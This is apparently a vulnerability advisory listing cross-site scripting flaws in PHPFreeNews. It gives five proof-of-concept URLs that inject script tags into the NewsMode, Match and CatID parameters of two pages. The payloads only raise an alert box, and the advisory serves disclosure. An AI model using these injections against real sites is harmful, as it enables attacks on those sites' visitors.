|
PHPFreeNews Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/phpfn/NewsCategoryForm.php?NewsMode="><script>alert(XSS);</script>&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match='><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert(XSS);</script> http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert(XSS);</script>&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match="><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 |
|
|
Privacy Statement |